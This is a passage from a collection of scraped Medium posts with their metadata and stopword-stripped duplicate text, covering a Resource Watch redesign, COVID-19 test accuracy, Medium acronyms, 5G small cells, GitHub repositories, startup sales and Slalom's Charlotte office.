hyperlink or an additional information button to cater to those who will be keen on reading more. Dani: In the case of Resource Watch, we’ve added customised features that allow users to curate and save the data they regularly use. When we designed this, we took inspiration from playlists and pinterest boards that people use to gather the things they care about most. We also drew inspiration from Netflix and how they categorise movies and tv shows, to help us assemble groups of datasets that relate to one another. The challenge here was to turn an experience that’s often considered boring into something fun! Data doesn’t need to be boring. Information is interesting! So, if we make the digestion of data easier, and let people enjoy it, they will use it! Boring can be a barrier. Data should be understandable, accessible and beautiful. Beauty comes from being understandable and accessible. These are the principles we follow when thinking about design. Every sprint needs a silly moment to help creative ideas flow. What’s your favourite thing about the new Resource Watch? Dani: My favourite thing about the new Resource Watch is that we are opening up new possibilities. We’ve created a stronger foundation from which we can grow. We’re turning our attention to better mobile design, and the design choices we’ve made up to now will make that next step easier to do. We’ve also opened up new possibilities for user customisation. I’m already feeling excited about the new things that will come in the future. Humans thinking for humans is what makes Resource Watch so special. We took the time to select which datasets should be offered up to each user. We haven’t relied on an algorithm to make those choices. When a user chooses a dataset, the recommendations they see will be contextually related and suggested by another human. Martin: I feel there is something cute and compact about the new Resource Watch, a bit like what Dani was saying before: you’re not getting rid of anything, it’s more that datasets are much more visible and ordered, as if it were a very tidy cupboard. I also really like the great job that the team did on the “explanations” (metadata) page of each dataset. In the new design, instead of redirecting users to a new page, the key bits of information have been condensed, so that they can now just fit into an elegant sidebar solution. Users can read the text information, and yet not lose sight of the map! Learn something new about our planet today on the Resource Watch explore page!
https://medium.com/vizzuality-blog/how-we-made-resource-watch-even-easier-to-use-37c21550a8a9
['Camellia Williams']
2020-07-15 13:50:47.657000+00:00
['Environment', 'User Research', 'Design', 'UX', 'Data']
Title made Resource Watch even easier useContent Design user research go hand hand come product development essential want make product useful usable used We’ve working Resource Watch team World Resources Institute WRI redesign make planetary data easier use spoke Dani Caso Designer Martin Dubuisson User Researcher find Resource Watch get redesign Dani User research done Martin revealed several thing could improve term user experience Resource Watch Rather taking problem one one finding isolated solution decided made sense reconfigure whole space Martin Explore page — sort library opensource global datasets accessed visualized map — really core offering Resource Watch year page hosted growing number datasets vast array different topic conversation user many described Explore page “overwhelming” Yes search datasets search bar user weren’t sure word type datasets available main challenge represent breadth data invite exploration inspire key element value proposition user time providing user quick access datasets searching addition also took advantage redesign tackle number change based need detected previous testing example included making easier user customise experience removing misleading redirections made conscious decision work closely Resource Watch team WRI carried interview together involved whole team coanalysis session asked review recording user testing could discus indepth crossreference interpretation fun exercise importantly helped ensure key learning user wouldn’t simply end onedirectional presentation therefore probably quickly forgotten Instead approach meant user insight built absorbed everyone team Members WRI’s Resource Watch team came Madrid office coanalysis session discussed finding user research detail information use develop new design Resource Watch Dani Knowing user need first important piece information need designing data platform Martin’s research told u policymakers journalist educator three key user Resource Watch conversation people three group also told u there’s wide range experience knowledge level need cater needed design would make Resource Watch data accessible usable goal provide tool someone need great analyst you’re expert climate data you’ll need guidance climate data expert you’ll want fastest entry point relevant data pitched approach WRI used Pixar movie ‘Ratatouille’ reference movie stuckup food critic learns anyone become great cook give tool good cook book work aim Resource Watch We’re giving every chef tool need create delicious dish data Martin project try gather much information possible situation making decision case main approach carry user testing — showing new design user hearing feedback analyzing behavior word also look quantitative source looked Google Analytics website analytics get large scale statistic user behavior know example keywords user enter search Resource Watch year we’ve developed solid understanding user we’ve revisiting conclusion previous user testing make sure build previous block knowledge gain increasingly accurate picture simplify thing without losing information Dani simplify thing everything order doesn’t mean need get rid thing simply reorganise It’s like tidying house choosing put thing probably won’t throw anything away put thing place make easier find need Martin user researcher it’s role find barrier block people finding information want find Dani us design take away Something user research team noticed many project people don’t bother reading long text — even long paragraph — example describe datasets might come big surprise we’ve heard attention span getting shorter project — many user scientific background — assumed would keen reading detail Truth many scienceminded people skim read want go straight point mean often wellworded wellplaced bullet point design always include hyperlink additional information button cater keen reading Dani case Resource Watch we’ve added customised feature allow user curate save data regularly use designed took inspiration playlist pinterest board people use gather thing care also drew inspiration Netflix categorise movie tv show help u assemble group datasets relate one another challenge turn experience that’s often considered boring something fun Data doesn’t need boring Information interesting make digestion data easier let people enjoy use Boring barrier Data understandable accessible beautiful Beauty come understandable accessible principle follow thinking design Every sprint need silly moment help creative idea flow What’s favourite thing new Resource Watch Dani favourite thing new Resource Watch opening new possibility We’ve created stronger foundation grow We’re turning attention better mobile design design choice we’ve made make next step easier We’ve also opened new possibility user customisation I’m already feeling excited new thing come future Humans thinking human make Resource Watch special took time select datasets offered user haven’t relied algorithm make choice user chooses dataset recommendation see contextually related suggested another human Martin feel something cute compact new Resource Watch bit like Dani saying you’re getting rid anything it’s datasets much visible ordered tidy cupboard also really like great job team “explanations” metadata page dataset new design instead redirecting user new page key bit information condensed fit elegant sidebar solution Users read text information yet lose sight map Learn something new planet today Resource Watch explore pageTags Environment User Research Design UX Data
3,813
How Accurate and Reliable is COVID-19 Testing?
COVID-19 / MEDICINE / HEALTH How Accurate and Reliable is COVID-19 Testing? PCR-based nasal swab testing and serological antibody testing both have certain limitations. As more and more state health departments and private enterprises continue to ramp up testing capacity for COVID-19, several health experts warn that test results are not 100 percent accurate and should be interpreted in the context of clinical presentation and exposure risk. The most commonly used PCR-based nasal swab test to detect SARS-CoV-2 is highly specific but not very sensitive, meaning positive results are more useful than negative results. In other words, a positive result almost guarantees infection with the novel coronavirus but a negative result cannot rule out the presence of infection. “The issue with the tests for the SARS-CoV-2 virus is that there has not been time to test them rigorously before deploying them in the field,” says Dr. Gary L. LeRoy, president of the American Academy of Family Physicians. “Most polymerase chain reaction (PCR) and antibody tests have years of laboratory testing before they are used. We just don’t have that kind of time. The major concern for false negatives is someone who tests negative, thinking they are not infected, could unknowingly spread the virus into the community.” Healthcare worker administers nasal swab test for COVID-19 at a drive-thru facility (Photo by Zstock) An article published in Mayo Clinic Proceedings draws attention to the risk posed by over-reliance on COVID-19 testing to make public health decisions. Priya Sampathkumar, M.D., an infectious diseases specialist at Mayo Clinic and study co-author, writes that healthcare officials should anticipate a “less visible second wave of infection from people with false-negative test results.” Based on preliminary evidence from China, quantitative reverse transcription polymerase chain reaction (qRT-PCR) COVID-19 testing on nasal swab samples may produce false negatives up to 30% of the time when testing is conducted 0–7 days after illness onset. After 15 days of illness, the chance of receiving a false negative result shoots up to 50%. That false negative figure may be even higher in the US, according to Harlan Krumholz, M.D., a professor of medicine at Yale. In an opinion piece for The New York Times, Dr. Krumholz expounds: “There are many reasons a test would be falsely negative under real-life conditions. Perhaps the sampling is inadequate. A common technique requires the collection of nasal secretions far back in the nose — and then rotating the swab several times. That is not an easy procedure to perform or for patients to tolerate. Other possible causes of false negative results are related to laboratory techniques and the substances used in the tests…If you have had likely exposures and symptoms suggest Covid-19 infection, you probably have it — even if your test is negative.” Nasal swab sample for COVID-19 test in the laboratory (Photo by Robert Kneschke) Dr. Alain Chaoui, head of Congenial Healthcare, a practice with 50,000 patients across five locations in Massachusetts, told The Boston Globe, “A lot of my patients who have symptoms, who I clinically think have COVID-19, are testing negative.” Chaoui is nonetheless advising all his patients who test negative for the virus to assume they are infected and self-quarantine until symptom-free for at least 72 hours. Michelle Taylor tested negative for COVID-19 twice despite presenting with concerning symptoms, including loss of taste and smell. Several doctors have said the long swabs inserted deep into a patient’s nose could miss the virus if the patient is not showing many symptoms at the time of the test. Dr. Paul Pottinger, an infectious disease physician at UW Medical Centerm explains, “The one caveat like we talked about before, if you go in to get tested too early — for example if you have no symptoms at all — then the test may not work very well. It’s really designed and validated for people who are having symptoms of infection when they have the test.” According to Dr. Lee Harold Hilborne, a professor of pathology and laboratory medicine at UCLA, the high rate of false negatives may be due to improper sample collection rather than inaccurate analytical laboratory techniques. Hilborne elaborates, “The majority of issues contributing to error in diagnostic testing are pre-analytic. These occur during specimen order, collection, and transport, before the specimen ever reaches the lab. We know that collection methods do not always pick up the virus. Studies suggest current swab collection may have sensitivity in the range of 60 to 75 percent. That means the specimen submitted to the laboratory from a patient with the infection will not contain the virus roughly 25 to 40 percent of the time.” RT-PCR test kit to detect presence of 2019-nCoV in clinical specimens (Photo by tilialucida) To address the risks associated with false-negative test results, Dr. Sampathkumar and colleagues outlined four evidence-based recommendations: Continued strict adherence to physical distancing, hand-washing, surface disinfection, masking and other preventive measures, regardless of risk level, symptoms or COVID-19 test results, must be emphasized. Development of highly sensitive and specific tests, including improved RT-PCR tests and serological assays to detect antibodies, are needed to minimize the incidence of false-negative results and the risk of ongoing transmission based on a false sense of security. Risk levels should be assessed prior to testing. Negative test results should be interpreted with caution, especially for individuals in higher-risk groups, such as healthcare workers. Risk-stratified protocols must be put in place in order to properly interpret negative test results. These protocols should employ statistical data on diagnostics, transmission, and outcomes. “For truly low-risk individuals, negative test results may be sufficiently reassuring,” says Colin West, M.D., Ph.D., a Mayo Clinic physician and the study’s first author. “For higher-risk individuals, even those without symptoms, the risk of false-negative test results requires additional measures to protect against the spread of disease, such as extended self-isolation.” 2019-nCoV IgM/IgG antibodies diagnostic laboratory test (Image by science photo) What about blood tests to detect antibodies, the body’s response to the virus? These tests have limited utility from a diagnostic standpoint, as the body may not have had enough time to produce detectable antibodies in the early stages of infection, leading to false negative results. However, serological testing may be used to detect previous exposure, evaluate community spread, and assess antibody titers. But for now, testing results are fraught with uncertainty. While individuals who recover from viral infections usually emerge with some degree of immunity, it is not yet known to what extent and for how long immunity to COVID-19 may last. Researchers are still unclear as to whether the presence of antibodies necessarily confers immunity to the novel coronavirus. Higher levels of antibodies generally indicates the mounting of a stronger immune response, but the levels of antibodies needed for COVID-19 immunity has not yet been established. The reliability of antibody testing is another point of contention adding to the confusion. In Laredo, Texas, a purchase of 20,000 rapid COVID-19 tests was recently seized by the federal government after local health department officials discovered the tests were only accurate about 20 percent of the time. Generally, antibody tests that utilize a technique known as ELISA (enzyme-linked immunosorbent assay) tend to outperform point-of-care (POC) lateral flow tests in terms of both sensitivity and specificity.
https://medium.com/medical-myths-and-models/how-accurate-and-reliable-is-covid-19-testing-41cbc97c1d47
['Nita Jain']
2020-09-30 01:41:53.451000+00:00
['Health', 'Education', 'Science', 'Ideas', 'Covid 19']
Title Accurate Reliable COVID19 TestingContent COVID19 MEDICINE HEALTH Accurate Reliable COVID19 Testing PCRbased nasal swab testing serological antibody testing certain limitation state health department private enterprise continue ramp testing capacity COVID19 several health expert warn test result 100 percent accurate interpreted context clinical presentation exposure risk commonly used PCRbased nasal swab test detect SARSCoV2 highly specific sensitive meaning positive result useful negative result word positive result almost guarantee infection novel coronavirus negative result cannot rule presence infection “The issue test SARSCoV2 virus time test rigorously deploying field” say Dr Gary L LeRoy president American Academy Family Physicians “Most polymerase chain reaction PCR antibody test year laboratory testing used don’t kind time major concern false negative someone test negative thinking infected could unknowingly spread virus community” Healthcare worker administers nasal swab test COVID19 drivethru facility Photo Zstock article published Mayo Clinic Proceedings draw attention risk posed overreliance COVID19 testing make public health decision Priya Sampathkumar MD infectious disease specialist Mayo Clinic study coauthor writes healthcare official anticipate “less visible second wave infection people falsenegative test results” Based preliminary evidence China quantitative reverse transcription polymerase chain reaction qRTPCR COVID19 testing nasal swab sample may produce false negative 30 time testing conducted 0–7 day illness onset 15 day illness chance receiving false negative result shoot 50 false negative figure may even higher US according Harlan Krumholz MD professor medicine Yale opinion piece New York Times Dr Krumholz expounds “There many reason test would falsely negative reallife condition Perhaps sampling inadequate common technique requires collection nasal secretion far back nose — rotating swab several time easy procedure perform patient tolerate possible cause false negative result related laboratory technique substance used tests…If likely exposure symptom suggest Covid19 infection probably — even test negative” Nasal swab sample COVID19 test laboratory Photo Robert Kneschke Dr Alain Chaoui head Congenial Healthcare practice 50000 patient across five location Massachusetts told Boston Globe “A lot patient symptom clinically think COVID19 testing negative” Chaoui nonetheless advising patient test negative virus assume infected selfquarantine symptomfree least 72 hour Michelle Taylor tested negative COVID19 twice despite presenting concerning symptom including loss taste smell Several doctor said long swab inserted deep patient’s nose could miss virus patient showing many symptom time test Dr Paul Pottinger infectious disease physician UW Medical Centerm explains “The one caveat like talked go get tested early — example symptom — test may work well It’s really designed validated people symptom infection test” According Dr Lee Harold Hilborne professor pathology laboratory medicine UCLA high rate false negative may due improper sample collection rather inaccurate analytical laboratory technique Hilborne elaborates “The majority issue contributing error diagnostic testing preanalytic occur specimen order collection transport specimen ever reach lab know collection method always pick virus Studies suggest current swab collection may sensitivity range 60 75 percent mean specimen submitted laboratory patient infection contain virus roughly 25 40 percent time” RTPCR test kit detect presence 2019nCoV clinical specimen Photo tilialucida address risk associated falsenegative test result Dr Sampathkumar colleague outlined four evidencebased recommendation Continued strict adherence physical distancing handwashing surface disinfection masking preventive measure regardless risk level symptom COVID19 test result must emphasized Development highly sensitive specific test including improved RTPCR test serological assay detect antibody needed minimize incidence falsenegative result risk ongoing transmission based false sense security Risk level assessed prior testing Negative test result interpreted caution especially individual higherrisk group healthcare worker Riskstratified protocol must put place order properly interpret negative test result protocol employ statistical data diagnostics transmission outcome “For truly lowrisk individual negative test result may sufficiently reassuring” say Colin West MD PhD Mayo Clinic physician study’s first author “For higherrisk individual even without symptom risk falsenegative test result requires additional measure protect spread disease extended selfisolation” 2019nCoV IgMIgG antibody diagnostic laboratory test Image science photo blood test detect antibody body’s response virus test limited utility diagnostic standpoint body may enough time produce detectable antibody early stage infection leading false negative result However serological testing may used detect previous exposure evaluate community spread ass antibody titer testing result fraught uncertainty individual recover viral infection usually emerge degree immunity yet known extent long immunity COVID19 may last Researchers still unclear whether presence antibody necessarily confers immunity novel coronavirus Higher level antibody generally indicates mounting stronger immune response level antibody needed COVID19 immunity yet established reliability antibody testing another point contention adding confusion Laredo Texas purchase 20000 rapid COVID19 test recently seized federal government local health department official discovered test accurate 20 percent time Generally antibody test utilize technique known ELISA enzymelinked immunosorbent assay tend outperform pointofcare POC lateral flow test term sensitivity specificityTags Health Education Science Ideas Covid 19
3,814
Let’s normalize these acronyms for a better Medium
Twitter has acronyms and so does Instagram and Facebook, when people use fff-follow for follow or kfb-kindly follow back, and so on. Well, they’re lame but social media acronyms and slangs are never cool, still, they make things easier on social media. How about we try the same thing on Medium? I’ve seen lots of authors trying to reply to all responses, it’s usually “thanks for reading.” How about we change that to TFR/tfr! Lots of readers love responding to stories they loved and enjoyed reading. How about we type ILT/ilt/lt! for “I loved this/loved this” The point is, we could normalize acronyms on Medium and use them “when necessary.” Just a suggestion. What do you think?
https://medium.com/wreader/lets-normalize-these-slangs-for-a-better-medium-d0330f7a570a
['Winifred J. Akpobi']
2020-12-06 10:54:24.378000+00:00
['Short Form', 'Advice', 'Writing Tips', 'Creativity', 'Writing']
Title Let’s normalize acronym better MediumContent Twitter acronym Instagram Facebook people use ffffollow follow kfbkindly follow back Well they’re lame social medium acronym slang never cool still make thing easier social medium try thing Medium I’ve seen lot author trying reply response it’s usually “thanks reading” change TFRtfr Lots reader love responding story loved enjoyed reading type ILTiltlt “I loved thisloved this” point could normalize acronym Medium use “when necessary” suggestion thinkTags Short Form Advice Writing Tips Creativity Writing
3,815
How Will Cities Pay for 5G? Ask Facebook.
Photo by Jack Sloop on Unsplash 5G is coming. 5G is the fifth generation of wireless networks. It’s significantly faster than current 4G networks, but the reason that 5G is important is not just so we can all watch Tiger King over and over on our phone or scroll endlessly through Facebook. It’s going to be essential to handle the massive increase in global mobile traffic that is expected in the next few years. Some estimates suggest that there will be over 5 times the mobile traffic in 2024 that there is today. 5G will be required to support that traffic. But there’s another reason that 5G will be important: it will enable cities to be able to become Smart Cities. What are smart cities? Smart Cities are basically cities that use technology to make planning and service delivery more efficient. The idea is that if you have a bunch of data about how resources are used or the behavior of people in the city, you can create a better functioning, safer city. For example, you can imagine a city that uses information about traffic and congestion to make traffic light wait times more efficient. Or, smart garbage disposal sites that send a signal when they are full, making disposal services more efficient. Information about water usage, electricity usage, and how people move throughout a city can also be used to inform policies and projects. Barcelona is already using this kind of technology to tell citizens where there are open parking spaces. Stockholm, Amsterdam, and Copenhagen, also each have smart city projects under development. At its core, smart cities rely on data to help make more effective administrative decisions. This data comes from sensors throughout a city that are connected over the Internet. Which brings us back to 5G: these types of large scale city design changes are possible, but only if they are supported by a suitably fast wireless network. The current networks would not be able to support these Smart City projects on a broad scale — but 5G networks could. Cities are therefore trying to build or facilitate the infrastructure needed for 5G networks, not only because they will be necessary to make those cities competitive, attract businesses, and give users the ability to download movies in seconds, but also because it is necessary to support a Smart City vision. If 5G is so important, why is it taking so long to get? Because it’s expensive. 5G networks are much faster than 4G, but the frequencies are also much higher — they’re between 24 and 72 GHz on a 5G network. What that means is that the signals don’t reach very far and they are easily blocked by trees, buildings, and other landscape features. To have the same kind of coverage that is possible with 4G networks, there would have to be many more cell towers. For cities and wireless companies, that means building a lot more infrastructure and laying way more fiber optic cable. And this is really expensive. Enter Facebook. Facebook seems to be expanding into every area of tech life (including getting into the cyber currency business), so it may not come as a surprise to you that they have also been working several projects to improve internet access. Their solution to the 5G infrastructure problem is a project called Terragraph. The solution they propose is to attach small cells to existing buildings and infrastructures that connect networks wirelessly. The small cells can be placed between existing cell towers. They act as intermediaries, connecting the cell towers to users, and extending the reach of those towers. Over long distances, this small cell wireless technology might not work very well. But as a “last mile” step between existing cell infrastructure and users, it’s able to deliver very fast service. And since the small cells can deliver data and connectivity from the cell towers to users wirelessly, they eliminate the need to lay more fiber optic cable, significantly cutting the cost of infrastructure. Facebook is not the only player in this game. At least a few other companies are also beginning to prototype similar “last mile” small cell technologies. This may be a good thing — while kind of infrastructure will be useful, there may be some legitimate privacy concerns about the company providing internet connectivity also having access to so much personal information about us through our online profiles. What does this all mean for us? 5G will be coming, one way or another. But with this new small cell technology, it may get to us a little quicker and with a much lower price tag attached. This is good news. Many Americans still don’t have access to broadband. The appearance of 5G will likely begin in the biggest cities, and may not be accessible to most Americans for many years. But the less expensive it is to build the infrastructure, the quicker people are likely to have access to it. Ultimately, 5G networks will mean much faster speeds and reduced latency for users who have access to it. For business, it may mean an improved ability to innovate. And for cities, it means the potential to begin to create smart systems that improve service systems.
https://medium.com/social-science/how-will-cities-pay-for-5g-ask-facebook-a97db6f7b786
['Ramsay Lewis']
2020-05-02 21:17:52.646000+00:00
['Technology', 'Cities', 'Science', 'Internet of Things', 'Future']
Title Cities Pay 5G Ask FacebookContent Photo Jack Sloop Unsplash 5G coming 5G fifth generation wireless network It’s significantly faster current 4G network reason 5G important watch Tiger King phone scroll endlessly Facebook It’s going essential handle massive increase global mobile traffic expected next year estimate suggest 5 time mobile traffic 2024 today 5G required support traffic there’s another reason 5G important enable city able become Smart Cities smart city Smart Cities basically city use technology make planning service delivery efficient idea bunch data resource used behavior people city create better functioning safer city example imagine city us information traffic congestion make traffic light wait time efficient smart garbage disposal site send signal full making disposal service efficient Information water usage electricity usage people move throughout city also used inform policy project Barcelona already using kind technology tell citizen open parking space Stockholm Amsterdam Copenhagen also smart city project development core smart city rely data help make effective administrative decision data come sensor throughout city connected Internet brings u back 5G type large scale city design change possible supported suitably fast wireless network current network would able support Smart City project broad scale — 5G network could Cities therefore trying build facilitate infrastructure needed 5G network necessary make city competitive attract business give user ability download movie second also necessary support Smart City vision 5G important taking long get it’s expensive 5G network much faster 4G frequency also much higher — they’re 24 72 GHz 5G network mean signal don’t reach far easily blocked tree building landscape feature kind coverage possible 4G network would many cell tower city wireless company mean building lot infrastructure laying way fiber optic cable really expensive Enter Facebook Facebook seems expanding every area tech life including getting cyber currency business may come surprise also working several project improve internet access solution 5G infrastructure problem project called Terragraph solution propose attach small cell existing building infrastructure connect network wirelessly small cell placed existing cell tower act intermediary connecting cell tower user extending reach tower long distance small cell wireless technology might work well “last mile” step existing cell infrastructure user it’s able deliver fast service since small cell deliver data connectivity cell tower user wirelessly eliminate need lay fiber optic cable significantly cutting cost infrastructure Facebook player game least company also beginning prototype similar “last mile” small cell technology may good thing — kind infrastructure useful may legitimate privacy concern company providing internet connectivity also access much personal information u online profile mean u 5G coming one way another new small cell technology may get u little quicker much lower price tag attached good news Many Americans still don’t access broadband appearance 5G likely begin biggest city may accessible Americans many year le expensive build infrastructure quicker people likely access Ultimately 5G network mean much faster speed reduced latency user access business may mean improved ability innovate city mean potential begin create smart system improve service systemsTags Technology Cities Science Internet Things Future
3,816
9 Popular GitHub Repos For Every Web Developer
Realworld The first repository in this list is Realworld. Its creators call it nothing less than “The Mother of all Demo Apps.” A bold statement, for sure, but I don’t think it’s an exaggeration. Realworld is an exemplary Medium.com clone (yes, the very platform you are probably surfing right now!). But not only that. The repository lets you choose between different front end and back end implementations, which you can happily mix. Vue.js + Node/Express or React /Redux + Rust? They got it! Realworld shows you how the exact same blog app is built on almost any popular language or framework. How awesome is that?
https://medium.com/better-programming/9-popular-github-repos-for-every-web-developer-6826582291bc
['Simon Holdorf']
2020-02-19 18:28:48.177000+00:00
['Technology', 'Programming', 'Productivity', 'Creativity', 'JavaScript']
Title 9 Popular GitHub Repos Every Web DeveloperContent Realworld first repository list Realworld creator call nothing le “The Mother Demo Apps” bold statement sure don’t think it’s exaggeration Realworld exemplary Mediumcom clone yes platform probably surfing right repository let choose different front end back end implementation happily mix Vuejs NodeExpress React Redux Rust got Realworld show exact blog app built almost popular language framework awesome thatTags Technology Programming Productivity Creativity JavaScript
3,817
Why Your Startup Isn’t Getting the Right Customers
Why Your Startup Isn’t Getting the Right Customers And what it takes to actually sell your “dream customers” Photo by krakenimages on Unsplash “I was sure our product would be perfect for them,” the founder fumed as she dropped into the chair on the other side of my desk. She was building software to help automate hospital billing services — a notoriously complex industry — and she was coming from a meeting where she’d pitched her software to the billing management team at the enormous hospital system associated with my university. To her, this seemed like a “dream customer,” and she couldn’t understand why they weren’t interested. “So the meeting didn’t go well?” I joked. She rolled her eyes, clearly not in the mood for my usual sarcasm. “It went terribly,” she moaned. “It felt like they were basically trying to push me out the door as quickly as they could. They had no interest in what I was pitching.” “Why was that?” I asked. Shew threw open her arms. “How the heck am I supposed to know? They didn’t tell me anything.” “It’s not their job to tell you,” I reminded her. “But it’s your job to figure it out. Since they didn’t react to your pitch the way you expected, what does that tell you?” “That I’m a failure,” she huffed. “Well, I suppose you did fail,” I replied. “But that doesn’t make you a failure. It’s only a failure if you can’t learn something. In this case, you actually have some valuable new data.” “But they didn’t tell me anything,” she said. “They weren’t remotely interested.” “That, right there!” I exclaimed, “That’s important data. You met with a company you thought was your dream customer and they had no interest in what you were selling. Shouldn’t that tell you something?” “I guess,” she said. “I mean… I guess it tells me I was wrong about who my dream customer should be.” “And you don’t think that’s important data?” I asked. “Yeah… I guess so,” she sighed. “I know so,” I said, feeling like I was trying to drag out an important lesson from my four-year-old daughter rather than a 20-something. “So what’s the next question you should be asking yourself?” She thought for a few moments, then shook her head in frustration. “I have no idea. Why was I such an idiot?” “That’s a good place to start,” I said. She raised her eyebrows, so I quickly explained further: “Not that I’m calling you an idiot. But you clearly misunderstood something about this particular customer’s business. That’s a big deal. In order to figure out how to target the right customers, you need to figure out what you’ve misunderstood.” “And how do I do that?” she asked. “Empathy,” I answered. “It’s one of the most important skills for an entrepreneur to develop. You have to be able to put yourself in the shoes of your prospective customers and attempt to see the world from their perspective.”
https://medium.com/swlh/why-your-startup-isnt-getting-the-right-customers-9f6972fb1e98
['Aaron Dinin']
2020-10-31 18:41:41.859000+00:00
['Work', 'Sales', 'Business', 'Startup', 'Entrepreneurship']
Title Startup Isn’t Getting Right CustomersContent Startup Isn’t Getting Right Customers take actually sell “dream customers” Photo krakenimages Unsplash “I sure product would perfect them” founder fumed dropped chair side desk building software help automate hospital billing service — notoriously complex industry — coming meeting she’d pitched software billing management team enormous hospital system associated university seemed like “dream customer” couldn’t understand weren’t interested “So meeting didn’t go well” joked rolled eye clearly mood usual sarcasm “It went terribly” moaned “It felt like basically trying push door quickly could interest pitching” “Why that” asked Shew threw open arm “How heck supposed know didn’t tell anything” “It’s job tell you” reminded “But it’s job figure Since didn’t react pitch way expected tell you” “That I’m failure” huffed “Well suppose fail” replied “But doesn’t make failure It’s failure can’t learn something case actually valuable new data” “But didn’t tell anything” said “They weren’t remotely interested” “That right there” exclaimed “That’s important data met company thought dream customer interest selling Shouldn’t tell something” “I guess” said “I mean… guess tell wrong dream customer be” “And don’t think that’s important data” asked “Yeah… guess so” sighed “I know so” said feeling like trying drag important lesson fouryearold daughter rather 20something “So what’s next question asking yourself” thought moment shook head frustration “I idea idiot” “That’s good place start” said raised eyebrow quickly explained “Not I’m calling idiot clearly misunderstood something particular customer’s business That’s big deal order figure target right customer need figure you’ve misunderstood” “And that” asked “Empathy” answered “It’s one important skill entrepreneur develop able put shoe prospective customer attempt see world perspective”Tags Work Sales Business Startup Entrepreneurship
3,818
Charlotte — a New Technology Hub. Slalom Charlotte has now been around…
Slalom Charlotte has now been around for 1 year — traversing WeWork and our new home at the Railyard in Southend. We are about to have our launch party and I wanted to reflect on the last 6 months in Charlotte, post the last 7 years in San Francisco. It’s been a growth-fueled ride, with all the trappings you want to see in a market you’re invested in. I wanted to capture all the amazing things that have been happening but also set the stage on what we’re building: THE most impactful consulting firm in the Charlotte region. Folks that join our Charlotte market are going to grow to heights they didn’t think possible, and work on products and solutions that transform companies and industries here. I spent the last 7 years in San Francisco working with some of the most innovative companies on the planet. I’ve taken much of that learning to Charlotte, and I’m floored at the opportunity here. It’s an incredible time to be in Charlotte. It’s not only the abundance of BBQ or the myriad of breweries, but the passion and care the community has here. (There are a lot of breweries, wowza) It’s an environment that you can grow and flourish in. My family and I have now been out here for 6 months, it’s felt like a few days. I’m excited to share more on the great things happening in Charlotte and Slalom. So, what is happening in Charlotte? IT’S BANKING! Yes, and it’s actually more — it’s manufacturing, retail, healthcare, telecom, defense and also banking. :) I am amazed at the diversity of industry here, which allows for us to really stand by the statement of diversity of work for our consultants, designers and engineers. There is not just diversity of industry, but diversity of work — modern application design, development, machine learning, IoT, cloud native architecture and transformation across [insert favorite buzzword]. A myriad of companies have announced technology hubs and new centers in Charlotte over the last few months. Why you might ask? Talent to cross train, attractive wages, lower housing costs than major 5 cities, good weather, proximity to top university areas, mountains and beaches. Here’s what I’ve noticed coming from one of the technology epicenters — you can do interesting, challenging, dynamic work in the field and it doesn’t solely have to be the Bay Area. I imagine that’s obvious to folks in other regions, but oftentimes the Silicon Valley influence can steer the conversation on tech work. There is no longer a requirement to be on the coast for technology adoption and high wages. The proliferation of services across the cloud vendors, availability of open source experts and education has catapulted these supposed second cities into soon-to-be-powerhouses. Charlotte on the verge — it will be a 3 year journey I’ve spent a lot of time with technology and business leaders in Charlotte, across most industries, and I’ve learned that these leaders are starved for talent, adoption of new technologies, practices and evolution. Many of the companies here are getting underway with cloud technologies, but what is so attractive is that many are grabbing onto AI & ML use cases as a catalyst for adoption. That will result in both super interesting initial work, and some complex enterprise work to set foundational cloud architecture and services. If you are a data scientist, designer or engineer, I would strongly consider the curve here. As I alluded to earlier, there are numerous companies announcing technology hubs, a new presence or a relocation to Charlotte in the last 6–12 months. It’s encouraging, but also a sign of a soon to be challenging talent war. Not so dissimilar to what many large cities face today, but perhaps pointed given the nature of industry and frantic pace of new build outs. By nature of industry, I mean many of the financial and manufacturing firms have a tremendous opportunity to modernize — in service of attaining new customers, delighting those customers and creating compelling products. We are and will continue to train the uber talented folks coming from these firms to grow into world class technologists and leaders. An example of the tremendous growth in Charlotte is our Slalom office. I relocated mid March and we had roughly 20 employees — today we sit north of 110 employees… A Call Out for Technologists I have been asked a number of times from local leaders on my perception of the market, and while some of this is highlighted above, I always return with a question — who do you look up to in the technology space, who are your technology leader or leaders? I have been getting a lot of blank stares. Let’s change this, together. Let’s attract and develop those technology leaders of tomorrow in Charlotte. If you aren’t in Charlotte yet, now is the time. You’re going to have diversity of industry, diversity of projects, diversity of thought and be a part of the rocket ship. Similar to getting asked about the technology scene in Charlotte, I get asked quite a bit on “Why Slalom” and frankly spend a lot of timing talking with clients and recruits on “Why Slalom”. The rationale is fairly simple, we are a very different consulting firm than many — here you can advise and build, design and innovate, and be on the ground floor to transform our clients. It’s rare to be a part of a firm of our size and not be beholden to powerpoint decks. (As much I like a good set of slides.) The second and third reasons are that folks that join Slalom can have variety (you don’t get pigeon-holed), learn new technologies and patterns, and work with the some profound & passionate experts. Our ability and desire to blend management consulting with technology, in a local market model with global services, is simply different. Charlotte is a great place to live now and will continue to grow into a powerhouse. If any of this peaks your interest, I would love to chat. Originally posted on LinkedIn here.
https://medium.com/state-of-analytics/charlotte-a-new-technology-hub-50093c5befde
['Kyle Roemer']
2019-11-26 18:31:28.001000+00:00
['Charlotte', 'Analytics', 'Software Development', 'Startup', 'Cloud Computing']
Title Charlotte — New Technology Hub Slalom Charlotte around…Content Slalom Charlotte around 1 year — traversing WeWork new home Railyard Southend launch party wanted reflect last 6 month Charlotte post last 7 year San Francisco It’s growthfueled ride trapping want see market you’re invested wanted capture amazing thing happening also set stage we’re building impactful consulting firm Charlotte region Folks join Charlotte market going grow height didn’t think possible work product solution transform company industry spent last 7 year San Francisco working innovative company planet I’ve taken much learning Charlotte I’m floored opportunity It’s incredible time Charlotte It’s abundance BBQ myriad brewery passion care community lot brewery wowza It’s environment grow flourish family 6 month it’s felt like day I’m excited share great thing happening Charlotte Slalom happening Charlotte IT’S BANKING Yes it’s actually — it’s manufacturing retail healthcare telecom defense also banking amazed diversity industry allows u really stand statement diversity work consultant designer engineer diversity industry diversity work — modern application design development machine learning IoT cloud native architecture transformation across insert favorite buzzword myriad company announced technology hub new center Charlotte last month might ask Talent cross train attractive wage lower housing cost major 5 city good weather proximity top university area mountain beach Here’s I’ve noticed coming one technology epicenter — interesting challenging dynamic work field doesn’t solely Bay Area imagine that’s obvious folk region oftentimes Silicon Valley influence steer conversation tech work longer requirement coast technology adoption high wage proliferation service across cloud vendor availability open source expert education catapulted supposed second city soontobepowerhouses Charlotte verge — 3 year journey I’ve spent lot time technology business 